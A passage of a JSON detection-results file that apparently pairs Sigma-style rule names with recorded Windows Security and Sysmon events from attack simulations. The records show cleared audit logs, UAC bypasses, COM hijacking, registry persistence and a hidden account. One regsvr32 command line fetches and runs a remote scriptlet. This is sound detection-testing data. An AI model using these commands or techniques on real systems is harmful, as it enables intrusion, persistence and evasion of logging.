group"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"MemberName":"-","MemberSid":"S-1-5-20","PrivilegeList":"-","SubjectDomainName":"MSEDGEWIN10","SubjectLogonId":"0x27a10f","SubjectUserName":"IEUser","SubjectUserSid":"S-1-5-21-3461203602-4096304019-2269080069-1000","TargetDomainName":"Builtin","TargetSid":"S-1-5-32-544","TargetUserName":"Administrators"},"System":{"Channel":"Security","Computer":"MSEDGEWIN10","Correlation":{"#attributes":{"ActivityID":"15957A0B-7182-0000-A07A-95158271D501"}},"EventID":4732,"EventRecordID":191030,"Execution":{"#attributes":{"ProcessID":624,"ThreadID":5108}},"Keywords":"0x8020000000000000","Level":0,"Opcode":0,"Provider":{"#attributes":{"Guid":"54849625-5478-4994-A5BA-3E3B0328C30D","Name":"Microsoft-Windows-Security-Auditing"}},"Security":null,"Task":13826,"TimeCreated":{"#attributes":{"SystemTime":"2019-09-22T11:23:19.251925Z"}},"Version":0}}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"System":{"Channel":"Security","Computer":"DC1.insecurebank.local","Correlation":null,"EventID":1102,"EventRecordID":203050,"Execution":{"#attributes":{"ProcessID":744,"ThreadID":768}},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"}},"Security":null,"Task":104,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-08T03:00:11.778188Z"}},"Version":0},"UserData":{"LogFileCleared":{"#attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"},"SubjectDomainName":"insecurebank","SubjectLogonId":"0x218b896","SubjectUserName":"administrator","SubjectUserSid":"S-1-5-21-738609754-2819869699-4189121830-500"}}}}},{"detection":["(Built-in Logic) - Security audit log was 
cleared"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"System":{"Channel":"Security","Computer":"DC1.insecurebank.local","Correlation":null,"EventID":1102,"EventRecordID":198242566,"Execution":{"#attributes":{"ProcessID":744,"ThreadID":3396}},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"}},"Security":null,"Task":104,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-25T21:28:11.073626Z"}},"Version":0},"UserData":{"LogFileCleared":{"#attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"},"SubjectDomainName":"insecurebank","SubjectLogonId":"0x8d7099","SubjectUserName":"bob","SubjectUserSid":"S-1-5-21-738609754-2819869699-4189121830-1108"}}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-06-14 22:22:21.503","Image":"C:\\Users\\IEUser\\Downloads\\a.exe","ProcessGuid":"365ABB72-1E19-5D04-0000-0010DFC60A00","ProcessId":4020,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\9QxTsAU9w8gyPj4w\\BRE6BgE2JubB.exe","UtcTime":"2019-06-14 
22:22:21.503"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":7531,"Execution":{"#attributes":{"ProcessID":1960,"ThreadID":288}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-06-14T22:22:21.503995Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"\"C:\\Users\\IEUser\\AppData\\Roaming\\9QxTsAU9w8gyPj4w\\BRE6BgE2JubB.exe\",explorer.exe","EventType":"SetValue","Image":"C:\\Users\\IEUser\\Downloads\\a.exe","ProcessGuid":"365ABB72-1E19-5D04-0000-0010DFC60A00","ProcessId":4020,"RuleName":"Persistence - Winlogon Shell","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell","UtcTime":"2019-06-14 22:22:21.519"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":7532,"Execution":{"#attributes":{"ProcessID":1960,"ThreadID":288}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-06-14T22:22:21.535245Z"}},"Version":2}}}},{"detection":["WMI Modules Loaded"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Company":"Microsoft Corporation","Description":"WMI","FileVersion":"6.1.7600.16385 
(win7_rtm.090713-1255)","Hashes":"SHA1=03DC8ABDF9C9948FE6E783DCA9C6C8264D635F0A,MD5=5610B0425518D185331CB8E968D060E6,SHA256=E235186C3BF266EE9EC733D2CFF35E3A65DE039C19B14260F4054F34B5E8AD41,IMPHASH=523D1DB34FC36465E35F6201A2FD561B","Image":"C:\\Users\\IEUser\\Downloads\\a.exe","ImageLoaded":"C:\\Windows\\System32\\wbem\\wmiutils.dll","ProcessGuid":"365ABB72-1E1D-5D04-0000-001003E70A00","ProcessId":1008,"Product":"Microsoft® Windows® Operating System","RuleName":"Execution - Suspicious WMI module load","Signature":"Microsoft Windows","SignatureStatus":"Valid","Signed":"true","UtcTime":"2019-06-14 22:22:31.925"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":7,"EventRecordID":7536,"Execution":{"#attributes":{"ProcessID":1960,"ThreadID":1916}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":7,"TimeCreated":{"#attributes":{"SystemTime":"2019-06-14T22:22:31.957120Z"}},"Version":3}}}},{"detection":["Logon Scripts (UserInitMprLogonScript)","Suspicious Userinit Child 
Process"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Users\\IEUser\\AppData\\Roaming\\9QxTsAU9w8gyPj4w\\BRE6BgE2JubB.exe\"","Company":"","CurrentDirectory":"C:\\Windows\\system32\\","Description":"NpmTaskRunner","FileVersion":"1.0.0.0","Hashes":"SHA1=E2286C233467D0E164ED5ED1D07BAC9F90F74D19,MD5=41CE32C0D1D4E5BB8C63674F317450EF,SHA256=5DE788D23B247B29F116CD0583280CE10A429E9F8C1D80C42DEAB20C6F4DBB4E,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744","Image":"C:\\Users\\IEUser\\AppData\\Roaming\\9QxTsAU9w8gyPj4w\\BRE6BgE2JubB.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-1E4A-5D04-0000-002013C00B00","LogonId":"0xbc013","ParentCommandLine":"C:\\Windows\\system32\\userinit.exe","ParentImage":"C:\\Windows\\System32\\userinit.exe","ParentProcessGuid":"365ABB72-1E51-5D04-0000-00104C340C00","ParentProcessId":3448,"ProcessGuid":"365ABB72-1E51-5D04-0000-00107B380C00","ProcessId":3444,"Product":"NpmTaskRunner","RuleName":"","TerminalSessionId":2,"User":"IEWIN7\\IEUser","UtcTime":"2019-06-14 22:23:13.925"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":7556,"Execution":{"#attributes":{"ProcessID":1960,"ThreadID":288}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-06-14T22:23:13.957120Z"}},"Version":5}}}},{"detection":["WMI Modules Loaded"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Company":"Microsoft Corporation","Description":"WMI","FileVersion":"6.1.7600.16385 
(win7_rtm.090713-1255)","Hashes":"SHA1=03DC8ABDF9C9948FE6E783DCA9C6C8264D635F0A,MD5=5610B0425518D185331CB8E968D060E6,SHA256=E235186C3BF266EE9EC733D2CFF35E3A65DE039C19B14260F4054F34B5E8AD41,IMPHASH=523D1DB34FC36465E35F6201A2FD561B","Image":"C:\\Users\\IEUser\\AppData\\Roaming\\9QxTsAU9w8gyPj4w\\BRE6BgE2JubB.exe","ImageLoaded":"C:\\Windows\\System32\\wbem\\wmiutils.dll","ProcessGuid":"365ABB72-1E54-5D04-0000-0010B7B30C00","ProcessId":1724,"Product":"Microsoft® Windows® Operating System","RuleName":"Execution - Suspicious WMI module load","Signature":"Microsoft Windows","SignatureStatus":"Valid","Signed":"true","UtcTime":"2019-06-14 22:23:26.811"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":7,"EventRecordID":7563,"Execution":{"#attributes":{"ProcessID":1960,"ThreadID":288}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":7,"TimeCreated":{"#attributes":{"SystemTime":"2019-06-14T22:23:26.811612Z"}},"Version":3}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\regedit.exe","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-8DEC-5F00-0000-0010F0460800","ProcessId":5128,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.reg\\OpenWithList\\b","UtcTime":"2020-07-04 
14:31:23.825"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":306383,"Execution":{"#attributes":{"ProcessID":3400,"ThreadID":4136}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-07-04T14:31:23.903600Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\regedit.exe","ProcessGuid":"747F3D96-92BB-5F00-0000-0010C1A73100","ProcessId":1452,"RuleName":"Persistence - Pending GPO","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\IEAK\\GroupPolicy\\PendingGPOs\\Count","UtcTime":"2020-07-04 14:31:26.607"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":306384,"Execution":{"#attributes":{"ProcessID":3400,"ThreadID":4136}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-07-04T14:31:26.838832Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DefaultInstall","EventType":"SetValue","Image":"C:\\Windows\\regedit.exe","ProcessGuid":"747F3D96-92BB-5F00-0000-0010C1A73100","ProcessId":1452,"RuleName":"Persistence - Pending 
GPO","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\IEAK\\GroupPolicy\\PendingGPOs\\Section1","UtcTime":"2020-07-04 14:31:26.607"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":306385,"Execution":{"#attributes":{"ProcessID":3400,"ThreadID":4136}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-07-04T14:31:26.849140Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"c:\\programdata\\gpo.inf","EventType":"SetValue","Image":"C:\\Windows\\regedit.exe","ProcessGuid":"747F3D96-92BB-5F00-0000-0010C1A73100","ProcessId":1452,"RuleName":"Persistence - Pending GPO","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\IEAK\\GroupPolicy\\PendingGPOs\\Path1","UtcTime":"2020-07-04 14:31:26.607"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":306386,"Execution":{"#attributes":{"ProcessID":3400,"ThreadID":4136}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-07-04T14:31:26.856657Z"}},"Version":2}}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network 
Connections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"\"c:\\windows\\tasks\\taskhost.exe\"","EventType":"SetValue","Image":"C:\\Users\\Public\\tools\\evasion\\a.exe","ProcessGuid":"747F3D96-8FD2-5F00-0000-0010C15D2200","ProcessId":3728,"RuleName":"Persistence - Hidden Run value detected","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\","UtcTime":"2020-07-04 14:18:58.231"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":306346,"Execution":{"#attributes":{"ProcessID":3400,"ThreadID":4136}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-07-04T14:18:58.268712Z"}},"Version":2}}}},{"detection":["Windows Registry Persistence COM Search Order Hijacking","OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"C:\\ProgramData\\demo.dll","EventType":"SetValue","Image":"C:\\Users\\IEUser\\Downloads\\com-hijack.exe","ProcessGuid":"365ABB72-47BB-5CE3-0000-0010BFA83E00","ProcessId":1912,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000_CLASSES\\CLSID\\{BCDE0395-E52F-467C-8E3D-C4579291692E}\\InprocServer32\\(Default)","UtcTime":"2019-05-21 
00:35:07.375"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":372,"Execution":{"#attributes":{"ProcessID":3416,"ThreadID":3496}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-21T00:35:07.474160Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-05-20 23:39:21.672","Image":"C:\\Users\\IEUser\\Downloads\\com-hijack.exe","ProcessGuid":"365ABB72-47BB-5CE3-0000-0010BFA83E00","ProcessId":1912,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\Downloads\\test.bat","UtcTime":"2019-05-21 00:35:07.375"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":373,"Execution":{"#attributes":{"ProcessID":3416,"ThreadID":3496}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-21T00:35:07.474160Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event 
Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"C:\\Users\\User\\Documents\\mapid.tlb","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"365ABB72-4FED-5CE3-0000-001031174900","ProcessId":3808,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000_CLASSES\\CLSID\\{49CBB1C7-97D1-485A-9EC1-A26065633066}\\InProcServer32\\{Default}","UtcTime":"2019-05-21 01:10:05.270"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":445,"Execution":{"#attributes":{"ProcessID":3416,"ThreadID":3496}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-21T01:10:05.290459Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"Apartment","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"365ABB72-5014-5CE3-0000-00105C444900","ProcessId":3860,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000_CLASSES\\CLSID\\{49CBB1C7-97D1-485A-9EC1-A26065633066}\\InProcServer32\\ThreadingModel","UtcTime":"2019-05-21 
01:10:44.797"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":447,"Execution":{"#attributes":{"ProcessID":3416,"ThreadID":3496}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-21T01:10:44.807281Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"{49CBB1C7-97D1-485A-9EC1-A26065633066}","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"365ABB72-501C-5CE3-0000-0010B5494900","ProcessId":2952,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000_CLASSES\\CLSID\\{84DA0A92-25E0-11D3-B9F7-00C04F4C8F5D}\\TreatAs\\{Default}","UtcTime":"2019-05-21 01:10:52.458"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":449,"Execution":{"#attributes":{"ProcessID":3416,"ThreadID":3496}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-21T01:10:52.468297Z"}},"Version":2}}}},{"detection":["Whoami Execution","Local Accounts Discovery","Whoami Execution Anomaly"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"whoami","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"whoami - displays logged on user information","FileVersion":"6.3.9600.16384 
(winblue_rtm.130821-1623)","Hashes":"SHA1=E06B89D9B87A8A4E5A8B7A5307C3BA88E0A01D41,MD5=D609D59A042C04A50EB41EC5D52F7471,SHA256=16C4CEE8C7BF4070E25A32F0B95857FA5CEC51E47D246E6FBAD69887460961B2,IMPHASH=98A3BC461E82881A801A12AAA668BD47","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"System","LogonGuid":"DFAE8213-832F-5CDD-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"\"C:\\Windows\\System32\\osk.exe\" ","ParentImage":"C:\\Windows\\System32\\osk.exe","ParentProcessGuid":"DFAE8213-8B02-5CDD-0000-00109BCA0A00","ParentProcessId":1720,"ProcessGuid":"DFAE8213-8B08-5CDD-0000-001011CE0A00","ProcessId":3764,"Product":"Microsoft® Windows® Operating System","RuleName":"technique_id=T1033,technique_name=System Owner/User Discovery","TerminalSessionId":2,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2019-05-16 16:08:40.350"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"DC1.insecurebank.local","Correlation":null,"EventID":1,"EventRecordID":18918,"Execution":{"#attributes":{"ProcessID":1744,"ThreadID":2120}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-16T16:08:40.360593Z"}},"Version":5}}}},{"detection":["Creation of a Local Hidden User Account by Registry"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\system32\\lsass.exe","ProcessGuid":"747F3D96-68DD-5FDD-0000-00101B660000","ProcessId":648,"RuleName":"Hidden Local Account Created","TargetObject":"HKLM\\SAM\\SAM\\Domains\\Account\\Users\\Names\\hideme0007$\\(Default)","UtcTime":"2020-12-18 
17:56:07.015"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":596571,"Execution":{"#attributes":{"ProcessID":3552,"ThreadID":5004}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-12-18T17:56:07.017817Z"}},"Version":2}}}},{"detection":["Regsvr32 Anomaly","Regsvr32 Flags Anomaly","Regsvr32 Network Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"/u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft(C) Register Server","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583","Image":"C:\\Windows\\System32\\regsvr32.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-B0EC-5CD9-0000-00201D340100","LogonId":"0x1341d","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k netsvcs","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentProcessGuid":"365ABB72-B0EC-5CD9-0000-0010D9D20000","ParentProcessId":944,"ProcessGuid":"365ABB72-B167-5CD9-0000-001062160C00","ProcessId":2476,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-13 
18:03:19.497"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":17287,"Execution":{"#attributes":{"ProcessID":276,"ThreadID":1000}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-13T18:03:19.681478Z"}},"Version":5}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000004)","EventType":"SetValue","Image":"C:\\Windows\\system32\\lsass.exe","ProcessGuid":"365ABB72-528D-5C91-0000-0010AD570000","ProcessId":500,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Control\\Lsa\\ProductType","UtcTime":"2019-03-19 20:35:25.831"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":13,"EventRecordID":1966215,"Execution":{"#attributes":{"ProcessID":1564,"ThreadID":1252}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-19T20:41:11.979726Z"}},"Version":2}}}},{"detection":["Possible Shim Database Persistence via sdbinst.exe"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\sdbinst.exe\" -q \"C:\\Windows\\AppPatch\\Test.SDB \" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\System32\\","Description":"Application Compatibility Database Installer","FileVersion":"6.0.7600.16385 
